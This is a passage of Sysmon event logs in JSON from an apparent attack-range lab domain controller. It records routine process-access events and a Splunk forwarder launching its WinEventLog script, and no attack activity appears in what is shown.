EM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3536,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3537,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3538,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3539,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3540,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-00106E530500}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-00106E530500}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3541,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.859\r\nProcessGuid: {A837DB8D-023C-5F25-0000-001016550500}\r\nProcessId: 3368\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.859","ProcessGuid":"{A837DB8D-023C-5F25-0000-001016550500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3542,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-001016550500}\r\nTargetProcessId: 3368\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.857","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-001016550500}","TargetProcessId":"3368","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3543,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-001016550500}\r\nTargetProcessId: 3368\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.857","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-001016550500}","TargetProcessId":"3368","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3544,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 